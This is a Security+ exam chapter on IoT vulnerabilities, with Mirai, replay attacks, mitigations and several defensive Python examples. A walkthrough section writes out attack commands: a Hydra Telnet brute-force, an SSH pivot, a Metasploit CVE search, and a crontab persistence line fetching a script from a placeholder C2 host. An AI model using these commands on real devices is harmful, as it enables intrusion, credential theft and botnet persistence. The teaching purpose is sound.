This chapter covers IoT (Internet of Things) security vulnerabilities, a critical topic for the SY0-701 exam under Domain 2.0 (Threats, Vulnerabilities, and Mitigations), Objective 2.3. IoT devices are increasingly common in homes, enterprises, and industrial settings, yet they often lack basic security controls, making them prime targets for attackers. You will learn about the unique challenges of IoT security, common attack vectors, and how to mitigate these risks — all essential knowledge for the Security+ exam and real-world practice.
Imagine a smart home lock that you control via a smartphone app. The lock itself is a small, low-power device with limited processing capabilities, so it can only afford basic encryption and authentication. The lock talks to your phone over Bluetooth, and the phone talks over Wi-Fi to the cloud service that manages access. Now consider an attacker who wants to break in. They don't need to pick the physical lock; instead, they exploit the lock's weak points: its default password (often 'admin' or '1234'), its unencrypted Bluetooth traffic, or its lack of firmware updates. The lock's manufacturer might have used a cheap microcontroller and, rather than fit a standard protocol such as TLS onto it, invented a weak proprietary one. The attacker could also record the traffic between your phone and the lock and mount a replay attack, capturing the unlock command and retransmitting it later. Once inside, the attacker might pivot to other devices on your home network, like a smart thermostat or camera, because the lock was never isolated from the rest of the network. This analogy mirrors IoT security vulnerabilities: limited hardware resources (CPU, memory, battery) force trade-offs that attackers exploit through default credentials, unencrypted communications, lack of patching, and insufficient network segmentation.
What Are IoT Security Vulnerabilities?
IoT security vulnerabilities refer to weaknesses in Internet-connected devices that can be exploited by attackers. These devices include smart home gadgets (thermostats, cameras, locks), wearable health monitors, industrial sensors, and medical implants. Unlike traditional IT devices (servers, laptops), IoT devices are typically resource-constrained — they have limited CPU, memory, battery, and storage. This forces manufacturers to make trade-offs, often sacrificing security for cost and performance. Common vulnerabilities include:
Default or hardcoded credentials: Many IoT devices ship with default usernames and passwords (e.g., admin/admin) that users never change.
Lack of encryption: Data transmitted between IoT devices and controllers may be unencrypted or use weak encryption (e.g., WEP, deprecated SSL/TLS versions).
Insecure firmware/software: Devices may run outdated components with publicly known vulnerabilities, and many run a custom OS with no patching mechanism at all.
No secure boot or code signing: Attackers can flash malicious firmware.
Insufficient authentication/authorization: Weak or missing authentication allows unauthorized access.
Insecure ecosystem interfaces: Web interfaces, APIs, and mobile apps may have vulnerabilities like XSS or SQL injection.
Lack of device management: No way to update or monitor devices centrally.
Physical vulnerabilities: Open debug ports (UART, JTAG) allow direct access.
How IoT Vulnerabilities Are Exploited Mechanically
Attackers follow a systematic process to exploit IoT devices:
1. Reconnaissance: Scan for IoT devices using tools like Shodan (a search engine for internet-connected devices) or Nmap. For example, Nmap can identify devices running default services on ports 80 (HTTP), 443 (HTTPS), 22 (SSH), or 23 (Telnet):
`nmap -sV -p 80,443,22,23,8080 <target>`
2. Initial Access: Use default credentials or brute-force weak passwords. Many IoT devices expose Telnet (port 23), which sends credentials in cleartext. Attackers can use tools like Hydra:
`hydra -l admin -P /usr/share/wordlists/rockyou.txt telnet://<target>`
3. Lateral Movement: Once on the device, attackers use it as a pivot point to reach other devices on the same network. Since IoT devices are often on the same VLAN as other systems, this can lead to data exfiltration or ransomware.
4. Persistence: Install malware or rootkits, or modify the firmware so the implant survives a reboot. Not all IoT malware bothers: Mirai runs from memory, is lost on reboot, and simply rescans for vulnerable devices (including ones it already infected) to rebuild the botnet.
5. Command & Control: The compromised device communicates with an external C2 server for instructions, often using HTTP or DNS tunneling to evade detection.
Key Components, Variants, and Standards
IoT Protocols: MQTT (Message Queuing Telemetry Transport), CoAP (Constrained Application Protocol), AMQP (Advanced Message Queuing Protocol), and HTTP/HTTPS. MQTT is lightweight and uses publish/subscribe model; it often lacks encryption (TLS is optional). CoAP is based on UDP and uses DTLS for security.
Standards: IEEE 802.15.4 (Zigbee), Bluetooth Low Energy (BLE), Z-Wave, Wi-Fi, and LoRaWAN. Each has security implications: Zigbee uses AES-128 encryption but can be vulnerable to key extraction; BLE uses AES-CCM but pairing can be insecure.
Firmware: Often stored in flash memory; updates are rarely signed or encrypted. Attackers can reverse-engineer firmware to find hardcoded credentials or backdoors.
Hardware: Microcontrollers (e.g., ESP32, ARM Cortex-M) with limited resources. They may lack hardware security modules (HSM) or trusted platform modules (TPM).
How Attackers Exploit IoT Vulnerabilities
Mirai Botnet (2016): Targeted IoT devices (routers, cameras) using default Telnet credentials. Infected devices launched DDoS attacks. The source code was released, leading to variants like Satori, Okiru, and Masuta.
Replay Attacks: Capture and retransmit valid data transmissions (e.g., unlock command). Mitigation: use timestamps or nonces.
Firmware Attacks: Modify firmware to add backdoors, typically after gaining code execution through another flaw. Example: CVE-2017-17215 in the Huawei HG532 router allowed remote code execution via crafted UPnP requests, and the Satori variant of Mirai used it to spread.
Side-Channel Attacks: Exploit physical characteristics (power consumption, electromagnetic emissions) to extract keys. For example, differential power analysis (DPA) can recover AES keys from a smart card.
Man-in-the-Middle (MitM): Intercept communications between IoT device and cloud. Use tools like Bettercap or Ettercap.
How Defenders Mitigate IoT Vulnerabilities
Change Default Credentials: Enforce unique passwords at manufacturing; use password policies.
Use Strong Encryption: TLS 1.2/1.3 for network traffic; DTLS for UDP; AES-128/256 for data at rest.
Secure Boot and Code Signing: Verify firmware integrity before booting; sign firmware with private keys.
Network Segmentation: Place IoT devices on a separate VLAN with strict firewall rules. Use micro-segmentation.
Regular Updates: Implement over-the-air (OTA) update mechanisms with signed payloads.
Disable Unused Services: Turn off Telnet, debug ports, and unnecessary protocols.
Monitor and Log: Use SIEM to detect anomalous behavior (e.g., unexpected outbound connections).
Use IoT Security Gateways: Devices that mediate traffic and enforce security policies.
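Added example, not part of the original chapter: a Python model of the verification a bootloader or OTA agent performs before writing a new image to flash, covering the Secure Boot, Code Signing and Regular Updates items above. Real devices verify an asymmetric signature against a public key fixed in ROM or OTP; this example uses HMAC-SHA256 with a device-provisioned key as a stand-in so it runs with the standard library only. The image layout (magic, length, hardware ID, version), the key and the hardware ID are assumptions made for the example.

```python
import hashlib
import hmac
import struct

# Constructed image format: header || payload || 32-byte authentication tag.
# In production the tag is an asymmetric signature (e.g., ECDSA/Ed25519)
# checked against a public key in ROM; HMAC with a provisioned key stands in here.
HEADER = struct.Struct(">4sIHH")   # magic, payload length, hardware ID, version
MAGIC = b"OTA1"


def build_image(key, hw_id, version, payload):
    """What the vendor's build pipeline produces (signing side)."""
    header = HEADER.pack(MAGIC, len(payload), hw_id, version)
    tag = hmac.new(key, header + payload, hashlib.sha256).digest()
    return header + payload + tag


class Device:
    def __init__(self, key, hw_id, version):
        self.key = key
        self.hw_id = hw_id
        self.version = version   # monotonic counter; real devices keep it in OTP/eFuse

    def verify_image(self, image):
        """Return (ok, reason). Every check runs before a single byte reaches flash."""
        if len(image) < HEADER.size + 32:
            return False, "truncated"
        header = image[:HEADER.size]
        magic, length, hw_id, version = HEADER.unpack(header)
        if magic != MAGIC:
            return False, "bad magic"
        if HEADER.size + length + 32 != len(image):
            return False, "length mismatch"
        payload = image[HEADER.size:HEADER.size + length]
        tag = image[HEADER.size + length:]
        # Authenticity first: header fields are only trusted once the tag checks out.
        expected = hmac.new(self.key, header + payload, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, tag):
            return False, "bad signature"
        if hw_id != self.hw_id:
            return False, "wrong hardware"   # genuine image, but for another product
        if version <= self.version:
            return False, "rollback"         # genuine but older: known-vulnerable build
        return True, "ok"

    def install(self, image):
        ok, reason = self.verify_image(image)
        if ok:
            self.version = HEADER.unpack(image[:HEADER.size])[3]
        return ok, reason


if __name__ == "__main__":
    key = b"k" * 32                                   # constructed provisioning key
    dev = Device(key, hw_id=0x0532, version=7)
    print(dev.install(build_image(key, 0x0532, 8, b"firmware v8")))   # (True, 'ok')
    print(dev.install(build_image(key, 0x0532, 7, b"firmware v7")))   # (False, 'rollback')
```

The anti-rollback check is the piece most often missing in the field: without it, an attacker can serve a correctly signed but vulnerable older image and "update" the device backwards.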
Real Command/Tool Examples
Shodan Search: Find exposed IoT devices. Example: shodan search "port:23".
Nmap Script: Detect default credentials: nmap --script http-default-accounts -p 80 <target>.
Firmware Analysis: Use Binwalk to extract firmware: binwalk -Me firmware.bin.
MQTT Security: Use mosquitto_sub over TLS on port 8883: mosquitto_sub -h broker -p 8883 -t topic --cafile ca.crt.
Scan for IoT Devices
Use Shodan or Nmap to discover IoT devices on the network. For example, search for devices with open port 23 (Telnet) or 80 (HTTP). Nmap can identify device types via service banners. Example command: `nmap -sV -p 23,80,443,8080 192.168.1.0/24`. Look for responses like 'Huawei HG532' or 'IP Camera'. This step reveals potential targets with known vulnerabilities.
Attempt Default Credentials
Exploit Known Vulnerabilities
Search for CVEs related to the device's firmware version. Use Metasploit to automate exploitation; inside msfconsole, `search cve:2017-17215` lists any module for the Huawei HG532 remote code execution bug, which is triggered by a crafted UPnP request. This step requires network access to the vulnerable service and knowledge of the device's firmware version.
Pivot to Internal Network
Once compromised, use the IoT device as a foothold to attack other systems. Set up a SOCKS proxy or use port forwarding to tunnel traffic. Example: `ssh -L 8080:internal-server:80 root@iot-device`. This works whenever the IoT device can reach the target, which is exactly the case when segmentation is missing and the device sits on the same VLAN as critical assets.
Establish Persistence
Install a backdoor or malware that survives reboots. Modify the init scripts or cron jobs. For example, add a system crontab entry that fetches instructions from a C2 server (entries in /etc/crontab require a user field): `echo "*/5 * * * * root /usr/bin/wget -O /tmp/update http://c2-server/update.sh" >> /etc/crontab`. Many IoT devices mount the root filesystem read-only, so durable persistence often means reflashing modified firmware instead. Mirai itself is not a rootkit: it runs from memory and does not survive a reboot, which is why it continuously rescans and reinfects devices.
Scenario 1: Enterprise IoT Camera Botnet
A SOC analyst notices unusual outbound traffic from an IP camera subnet to a known malicious IP. Using a SIEM like Splunk, they see connections on port 23 (Telnet) and 80 (HTTP) from internal to external. The analyst looks up the camera's model and finds it ships with a known default password. The correct response: isolate the camera subnet via ACL, change all default credentials, and update firmware. A common mistake: assuming the camera is a low-risk device and ignoring the alert, leading to the camera being used in a DDoS attack.
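Added example, not from the original chapter: Python detection logic for the "Monitor and Log" mitigation and the Scenario 1 triage above, run over constructed flow records. The camera subnet, the vendor cloud address, the threat-intel indicator, the thresholds and the flow format are all assumptions; a SIEM would feed real NetFlow or firewall logs into the same rules.

```python
import ipaddress
from collections import defaultdict

# Every address, subnet and flow below is constructed for this example.
IOT_SUBNET = ipaddress.ip_network("10.20.30.0/24")            # camera VLAN
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
ALLOWED_EXTERNAL = {ipaddress.ip_address("203.0.113.10")}     # vendor cloud, per asset inventory
KNOWN_BAD = {ipaddress.ip_address("198.51.100.77")}           # threat-intel indicator
SCAN_PORTS = {23, 2323}                                       # Mirai-style Telnet scanning
SCAN_THRESHOLD = 10                                           # distinct targets before alerting


def parse_flow(line):
    """Constructed flow format: '<epoch> <src> <dst> <proto> <dport> <bytes>'."""
    ts, src, dst, proto, dport, nbytes = line.split()
    return {"ts": int(ts), "src": ipaddress.ip_address(src), "dst": ipaddress.ip_address(dst),
            "proto": proto, "dport": int(dport), "bytes": int(nbytes)}


def is_internal(addr):
    return any(addr in net for net in INTERNAL_NETS)


def detect(flow_lines):
    """Return (source, rule, detail) alerts for flows that originate in the IoT VLAN."""
    alerts = []
    scan_targets = defaultdict(set)
    for line in flow_lines:
        line = line.strip()
        if not line:
            continue
        f = parse_flow(line)
        if f["src"] not in IOT_SUBNET:
            continue                                   # only IoT-originated traffic is in scope
        if is_internal(f["dst"]):
            if f["dst"] not in IOT_SUBNET:             # camera reaching a server VLAN: pivot attempt
                alerts.append((str(f["src"]), "lateral", f"{f['dst']}:{f['dport']}"))
            continue
        if f["dst"] in KNOWN_BAD:
            alerts.append((str(f["src"]), "c2", f"{f['dst']}:{f['dport']}"))
            continue
        if f["dport"] in SCAN_PORTS:
            scan_targets[f["src"]].add(f["dst"])      # aggregate; a single probe is noise
            continue
        if f["dst"] not in ALLOWED_EXTERNAL:           # a camera should only talk to its vendor
            alerts.append((str(f["src"]), "unexpected-external", f"{f['dst']}:{f['dport']}"))
    for src, targets in scan_targets.items():
        if len(targets) >= SCAN_THRESHOLD:
            alerts.append((str(src), "telnet-scan", f"{len(targets)} distinct hosts on 23/2323"))
    return alerts


SAMPLE_FLOWS = [
    "1700000001 10.20.30.5 203.0.113.10 tcp 443 5120",     # normal: vendor cloud
    "1700000002 10.20.30.5 198.51.100.77 tcp 80 640",      # C2 check-in
    "1700000003 10.20.30.5 10.10.1.15 tcp 445 900",        # SMB toward a server VLAN
    "1700000004 10.20.30.7 203.0.113.10 tcp 443 4096",     # healthy camera
    "1700000005 10.10.1.15 203.0.113.10 tcp 443 100",      # not IoT, out of scope
] + [f"17000001{i:02d} 10.20.30.5 203.0.113.{100 + i} tcp 23 60" for i in range(1, 13)]

if __name__ == "__main__":
    for alert in detect(SAMPLE_FLOWS):
        print(alert)   # c2, lateral and telnet-scan, all from 10.20.30.5
```

The allowlist rule is what makes IoT monitoring tractable: a camera has a tiny, predictable set of legitimate destinations, so anything else is worth a ticket even without a threat-intel match.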
Scenario 2: Medical Device Ransomware
A hospital's smart infusion pump is compromised via a publicly disclosed vulnerability that was never patched. The attacker gains access to the hospital's network and deploys ransomware. The analyst uses Wireshark to detect abnormal MQTT traffic from the pump to an external broker. Correct response: disconnect the pump, segment IoT devices onto a separate VLAN with no internet access, and enforce signed firmware updates. Common mistake: failing to monitor IoT traffic because it's considered 'non-critical', allowing the attack to go unnoticed for days.
Scenario 3: Smart Building HVAC Attack
An attacker exploits a default password on a building's smart thermostat to access the building management system (BMS). They then modify temperature settings to cause physical damage or increase energy costs. The engineer uses Nessus to scan for default credentials on the thermostat's web interface. Correct response: change passwords, disable remote management, and implement network segmentation. Common mistake: assuming the BMS is on an isolated network, but it's actually connected to the corporate network for convenience.
What SY0-701 Tests on This Objective
Objective 2.3 focuses on vulnerabilities associated with IoT devices. The exam expects you to:
Identify common IoT vulnerabilities: default credentials, lack of encryption, insecure firmware, weak authentication.
Understand attack vectors: Mirai botnet, replay attacks, MitM, firmware attacks.
Know mitigation strategies: network segmentation, secure boot, OTA updates, strong encryption.
Recognize protocols: MQTT, CoAP, Zigbee, BLE.
Common Wrong Answers and Why Candidates Choose Them
"Always use WPA2 for IoT devices" – Wrong because WPA2 is for Wi-Fi encryption; IoT devices may use other protocols like Zigbee. Candidates confuse network encryption with device security.
"IoT devices are secure because they use encryption" – Wrong because many IoT devices use weak encryption or no encryption. Candidates assume all devices follow best practices.
"Disabling unused ports is sufficient" – Wrong because it only reduces attack surface; other vulnerabilities remain (e.g., default credentials).
"IoT devices should be on the same network as other devices for convenience" – Wrong because segmentation is critical.
Specific Terms and Values
Mirai: botnet that exploited default Telnet credentials.
Port 23: Telnet; port 80: HTTP; port 443: HTTPS; port 1883: MQTT (8883 with TLS); port 5683: CoAP.
CVE-2017-17215: Huawei HG532 router RCE.
AES-128: common encryption for Zigbee.
Trick Questions
'Firmware update' vs 'patch management': firmware updates apply to IoT and embedded devices, patch management to traditional IT.
'Default credentials' vs 'weak passwords': default credentials are pre-set by the vendor; weak passwords are user-chosen.
Decision Rule On scenario questions, eliminate answers that:
Suggest placing IoT devices on the same VLAN as critical systems.
Ignore the need for encryption or authentication.
Rely solely on antivirus (ineffective on IoT).
Assume all IoT devices are patched automatically.
IoT vulnerabilities include default credentials, lack of encryption, insecure firmware, and weak authentication.
The Mirai botnet exploited default Telnet credentials on IoT devices to create a massive DDoS botnet.
Network segmentation is critical: place IoT devices on separate VLANs with strict firewall rules.
Secure boot and code signing ensure only authorized firmware runs on IoT devices.
MQTT uses port 1883 (unencrypted) and 8883 (TLS); CoAP uses UDP port 5683, or 5684 with DTLS (CoAPS).
Always change default credentials and disable unnecessary services like Telnet.
Firmware analysis tools like Binwalk can extract hidden credentials and backdoors.
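Added example, not code from the original chapter or from Binwalk: after binwalk -Me has carved the filesystem out of an image, the next step is hunting for credentials in it. This Python block does a strings-style sweep over a constructed firmware blob, parses any /etc/passwd- or /etc/shadow-style lines it finds, classifies the hash field, flags extra UID 0 accounts, and greps for key=value secrets. The blob contents, account names, hash and key name are all invented for the example.

```python
import re

STRING_RE = re.compile(rb"[\x20-\x7e]{6,}")      # printable runs, like the `strings` utility
PASSWD_RE = re.compile(r"^([a-zA-Z_][a-zA-Z0-9_-]*):([^:]*):(\d+):(\d+):")
SECRET_RE = re.compile(r"(passw(?:or)?d|secret|token|api_key|private_key)\s*[=:]\s*(\S+)", re.I)

# Constructed "firmware": a uImage-style magic, binary filler, and a few
# embedded text fragments of the kind found in a squashfs root.
SAMPLE_FIRMWARE = (
    b"\x27\x05\x19\x56" + b"\x00\xff" * 40
    + b"root:$1$abcdefgh$ABCDEFGHIJKLMNOPQRSTUV:0:0:root:/root:/bin/sh\n"
    + b"admin::0:0:Administrator:/:/bin/sh\n"
    + b"support:x:0:0:vendor support:/:/bin/sh\n"
    + b"nobody:*:65534:65534:nobody:/:/bin/false\n"
    + b"\x00\xff" * 40
    + b"telnetd_user=support\n"
    + b"cloud_api_key=EXAMPLE0123456789\n"
    + b"\x00\xff" * 40
)


def extract_strings(blob):
    return [m.group().decode("ascii") for m in STRING_RE.finditer(blob)]


def classify_hash(field):
    """Interpret the password field of a passwd/shadow entry."""
    if field == "":
        return "EMPTY: login with no password"
    if field == "x":
        return "shadowed: look in /etc/shadow"
    if field.startswith(("*", "!")):
        return "locked"
    if field.startswith("$1$"):
        return "md5crypt (fast to brute-force offline)"
    if field.startswith("$5$"):
        return "sha256crypt"
    if field.startswith("$6$"):
        return "sha512crypt"
    if len(field) == 13:
        return "DES crypt (weak)"
    return "unknown"


def find_passwd_entries(strings):
    entries = []
    for s in strings:
        m = PASSWD_RE.match(s)
        if m:
            user, pw, uid, gid = m.groups()
            entries.append({"user": user, "uid": int(uid), "gid": int(gid),
                            "hash": classify_hash(pw), "raw": pw})
    return entries


def find_hardcoded_secrets(strings):
    found = []
    for s in strings:
        m = SECRET_RE.search(s)
        if m:
            found.append((m.group(1).lower(), m.group(2)))
    return found


def analyze(blob):
    strings = extract_strings(blob)
    entries = find_passwd_entries(strings)
    return {
        "passwd": entries,
        "uid0_accounts": [e["user"] for e in entries if e["uid"] == 0],  # more than 'root' is suspicious
        "secrets": find_hardcoded_secrets(strings),
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_FIRMWARE)
    for e in report["passwd"]:
        print(f"{e['user']:10} uid={e['uid']:<6} {e['hash']}")
    print("UID 0 accounts:", report["uid0_accounts"])
    print("secrets:", report["secrets"])
```

On a real extraction, point extract_strings at the carved rootfs files (or the whole image) and feed any md5crypt/DES hashes to an offline cracker; the empty-password and extra-UID-0 findings need no cracking at all.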
These come up on the exam all the time. Here's how to tell them apart.
IoT Device Vulnerabilities
Limited CPU/memory make full TLS stacks and public-key operations expensive, so vendors often weaken or skip encryption
Often ship with default credentials, sometimes hardcoded so they cannot be changed
Firmware updates rare or nonexistent
Use lightweight protocols (MQTT, CoAP) with weak security
Physical access often easy (debug ports)
Traditional IT Device Vulnerabilities
Sufficient resources for full encryption
Password policies enforced via AD
Regular patching via WSUS or SCCM
Use standard protocols (HTTPS, SSH) with strong security
Physical security controls (locks, server rooms)
Mistake
IoT devices are too small to be hacked.
Correct
Size doesn't prevent exploitation; attackers use default credentials and known vulnerabilities to compromise resource-constrained devices for botnets or pivoting.
Mistake
Encryption alone makes IoT devices secure.
Correct
Encryption protects data in transit, but devices may still have weak authentication, insecure firmware, or physical access vulnerabilities.
Mistake
All IoT devices support automatic updates.
Correct
Many IoT devices lack OTA update mechanisms; users must manually update, which rarely happens.
Mistake
IoT devices are isolated from the network.
Correct
IoT devices often share the same network as other devices, allowing lateral movement after compromise.
Mistake
Changing the default password is enough.
Correct
While important, other vulnerabilities like unencrypted communications, insecure APIs, and lack of secure boot remain.
Default credentials are the most common IoT vulnerability. Many devices ship with usernames and passwords like 'admin/admin' or 'root/root', and users rarely change them. Attackers use tools like Hydra to brute-force these credentials, gaining full access. On the exam, remember that default credentials are a top attack vector.
Mirai scans the internet for IoT devices with open Telnet ports (23 and 2323) and attempts to log in using a short hardcoded list of roughly 60 default username/password pairs. Once a login succeeds, a loader delivers the malware binary, which reports to a C2 server and kills competing processes on the device. The botnet then launches DDoS attacks. Mirai's source code was released in 2016, leading to many variants.
MQTT is a publish/subscribe protocol over TCP (port 1883) with optional TLS (8883). CoAP is a request/response protocol over UDP (port 5683) with DTLS security. MQTT is more common in home automation; CoAP is used in constrained devices. Both lack mandatory encryption, so security relies on implementation.
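Added example, not from the original chapter: because MQTT security "relies on implementation", the practical check is the broker configuration. This Python block embeds a weak and a hardened Mosquitto configuration (both constructed) and audits them with a small parser that mirrors how Mosquitto scopes directives: TLS settings belong to the most recently declared `listener`, while authentication and ACL settings are global. The file paths are placeholders, and the defaults assumed (allow_anonymous false, TLS 1.2 minimum) are those of Mosquitto 2.x.

```python
WEAK_CONF = """\
# Typical out-of-the-box broker on an IoT hub (constructed example)
listener 1883
allow_anonymous true
"""

HARDENED_CONF = """\
# Authentication and authorization apply to every listener
allow_anonymous false
password_file /etc/mosquitto/passwd
acl_file /etc/mosquitto/acl

# Plaintext only for processes on the hub itself
listener 1883 127.0.0.1

# Devices on the network must use TLS with client certificates
listener 8883
cafile /etc/mosquitto/certs/ca.crt
certfile /etc/mosquitto/certs/broker.crt
keyfile /etc/mosquitto/certs/broker.key
require_certificate true
use_identity_as_username true
tls_version tlsv1.2
"""

# Directives Mosquitto attaches to the preceding `listener` line.
LISTENER_KEYS = {"cafile", "capath", "certfile", "keyfile", "require_certificate",
                 "use_identity_as_username", "tls_version", "ciphers", "crlfile"}
LOCAL_BINDS = {"127.0.0.1", "::1", "localhost"}


def parse_mosquitto_conf(text):
    """Return (global_settings, [listener dicts]); comment lines start with '#'."""
    global_settings, listeners, current = {}, [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        value = value.strip()
        if key == "listener":
            port, _, bind = value.partition(" ")
            current = {"port": int(port), "bind": bind.strip()}
            listeners.append(current)
        elif key in LISTENER_KEYS and current is not None:
            current[key] = value
        else:
            global_settings[key] = value      # per_listener_settings false (the default)
    return global_settings, listeners


def audit_mosquitto_conf(text):
    """Return a list of (severity, finding); an empty list means nothing was flagged."""
    g, listeners = parse_mosquitto_conf(text)
    findings = []
    if g.get("allow_anonymous", "false").lower() == "true":
        findings.append(("high", "allow_anonymous true: clients connect without credentials"))
    if "password_file" not in g and "auth_plugin" not in g:
        findings.append(("high", "no password_file: no client authentication configured"))
    if "acl_file" not in g:
        findings.append(("medium", "no acl_file: any authenticated client can read/write every topic"))
    for lst in listeners:
        tls = "certfile" in lst and "keyfile" in lst
        if not tls and lst["bind"] not in LOCAL_BINDS:
            findings.append(("high", f"listener {lst['port']}: plaintext MQTT reachable from the network"))
        if tls and lst.get("tls_version", "tlsv1.2") in {"tlsv1", "tlsv1.1"}:
            findings.append(("medium", f"listener {lst['port']}: {lst['tls_version']} still allowed"))
        if tls and lst.get("require_certificate", "false") != "true":
            findings.append(("low", f"listener {lst['port']}: password-only device auth, no client certificates"))
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_mosquitto_conf(conf) or "no findings")
```

The hardened file is the one to remember for the exam's "which control" questions: credentials (password_file), authorization (acl_file), transport encryption (8883 with certfile/keyfile), and device identity (require_certificate) are four separate controls, and the weak file lacks all of them.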
Mitigations include: changing default credentials, using strong encryption (TLS/DTLS), implementing secure boot and code signing, segmenting IoT devices on separate VLANs, disabling unnecessary services (Telnet, debug ports), and regularly updating firmware via signed OTA updates. Also, use IoT security gateways and monitor traffic with SIEM.
A replay attack captures a valid data transmission (e.g., an unlock command) and retransmits it later to cause unauthorized action. For example, an attacker captures the signal from a smart lock's remote and replays it to unlock the door. Mitigation: use timestamps, sequence numbers, or nonces in the protocol.
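Added example, not from the original chapter: a Python simulation of the replay attack described here and under "How Attackers Exploit IoT Vulnerabilities", with the smart lock from the opening analogy on both sides. The naive lock accepts a fixed, MAC-protected UNLOCK message, so a recording replays successfully; the hardened lock issues a random nonce that must be covered by the MAC and accepts each nonce once, so the recording is useless. The key, message format and lock API are assumptions made for the example.

```python
import hashlib
import hmac
import os

# Shared secret provisioned between the phone app and the lock (constructed).
LOCK_KEY = bytes.fromhex("3a7f1c" * 8)


class NaiveLock:
    """Vulnerable design: a fixed UNLOCK message protected only by a MAC.
    Nothing in the message changes between uses, so a captured message
    can be replayed any time later."""

    def __init__(self, key):
        self.key = key
        self.unlocked = False

    def handle(self, msg, tag):
        expected = hmac.new(self.key, msg, hashlib.sha256).digest()
        if msg == b"UNLOCK" and hmac.compare_digest(expected, tag):
            self.unlocked = True
            return True
        return False


def naive_phone_unlock(key):
    msg = b"UNLOCK"
    return msg, hmac.new(key, msg, hashlib.sha256).digest()


class NonceLock:
    """Hardened design: challenge-response. The lock hands out a fresh random
    nonce, the phone answers with HMAC(key, nonce || command), and the lock
    accepts each nonce exactly once. A recorded answer is useless afterwards."""

    def __init__(self, key):
        self.key = key
        self.unlocked = False
        self.outstanding = set()

    def challenge(self):
        nonce = os.urandom(16)
        self.outstanding.add(nonce)
        return nonce

    def handle(self, nonce, cmd, tag):
        if nonce not in self.outstanding:
            return False                      # unknown or already-used nonce: replay or forgery
        self.outstanding.discard(nonce)       # consume it even if the MAC check fails
        expected = hmac.new(self.key, nonce + cmd, hashlib.sha256).digest()
        if cmd == b"UNLOCK" and hmac.compare_digest(expected, tag):
            self.unlocked = True
            return True
        return False


def nonce_phone_respond(key, nonce, cmd=b"UNLOCK"):
    return hmac.new(key, nonce + cmd, hashlib.sha256).digest()


def demo_naive_replay():
    """True if an attacker's replay of a sniffed message unlocks the naive lock."""
    lock = NaiveLock(LOCK_KEY)
    msg, tag = naive_phone_unlock(LOCK_KEY)    # attacker records this exchange
    assert lock.handle(msg, tag)               # legitimate unlock
    lock.unlocked = False                      # owner locks up and leaves
    return lock.handle(msg, tag)               # replay of the recording


def demo_nonce_replay():
    """True if a replay or a reuse of a sniffed tag unlocks the nonce lock."""
    lock = NonceLock(LOCK_KEY)
    nonce = lock.challenge()
    tag = nonce_phone_respond(LOCK_KEY, nonce)  # attacker records nonce and answer
    assert lock.handle(nonce, b"UNLOCK", tag)   # legitimate unlock
    lock.unlocked = False
    replayed = lock.handle(nonce, b"UNLOCK", tag)   # same nonce again: rejected as consumed
    fresh = lock.challenge()
    forged = lock.handle(fresh, b"UNLOCK", tag)     # old tag, new nonce: MAC mismatch
    return replayed or forged


if __name__ == "__main__":
    print("naive lock replay succeeded:", demo_naive_replay())   # True
    print("nonce lock replay succeeded:", demo_nonce_replay())   # False
```

Where the device cannot afford a round trip (a one-way key fob, for example), a monotonically increasing counter covered by the MAC does the same job: the lock stores the last counter it accepted and rejects anything at or below it, which is the rolling-code idea the text's "sequence numbers" refers to.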
IoT devices often have exposed debug ports (UART, JTAG) that allow direct firmware extraction or modification. An attacker with physical access can dump firmware, extract keys, or flash malicious code. Physical security controls like tamper-evident seals and locking enclosures are necessary.
Shodan is a search engine that indexes internet-connected devices. Attackers use it to find vulnerable IoT devices by searching for specific banners, open ports, or default credentials. For example, searching 'port:23' finds Telnet-enabled devices. Defenders use Shodan to audit their own exposed assets.